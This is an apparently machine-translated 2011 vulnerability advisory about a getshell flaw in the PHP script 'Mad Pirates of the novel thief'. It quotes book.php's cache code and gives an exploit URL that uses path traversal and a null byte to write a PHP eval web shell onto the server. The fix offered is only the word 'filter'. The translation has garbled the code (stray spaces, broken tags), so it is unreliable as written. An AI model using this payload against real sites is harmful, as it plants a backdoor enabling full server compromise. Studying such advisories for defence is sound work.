Mad Pirates of the novel the thief GETshell vulnerabilities and fixes-vulnerability warning-the black bar safety net

2011-11-30T00:00:00
ID MYHACK58:62201132485
Type myhack58
Reporter 佚名
Modified 2011-11-30T00:00:00

Description

Team:t00ls Author: Cond0r

Silly than a vulnerability

Must be turned on cache to use

First look at the code

book.php

$kd_cachedir = "./ cache";

if($kd_book_cache=="ture"){//cache must be turned on

$lastflesh = @filemtime($kd_cachedir."/ book$shuid.html");

// echo $lastflesh;

if(! file_exists("./ cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 6 0 * 6 0) <= time())){

ob_start();

include "./ templates/$kd_moban/book.html";

$mianfei = ob_get_contents();

ob_end_clean();

file_put_contents("./ cache/book$shuid.html",$mianfei);

echo file_get_contents($kd_cachedir."/ book$shuid.html");

}else{

echo file_get_contents("./ cache/book$shuid.html");

}

}else{

include "./ templates/$kd_moban/book.html";

}

?& gt;

exp:http://www. badguest. cn /book. php? id=/../../1. php%0 0“><? php eval($_POST[a])?& gt;

Fix: filter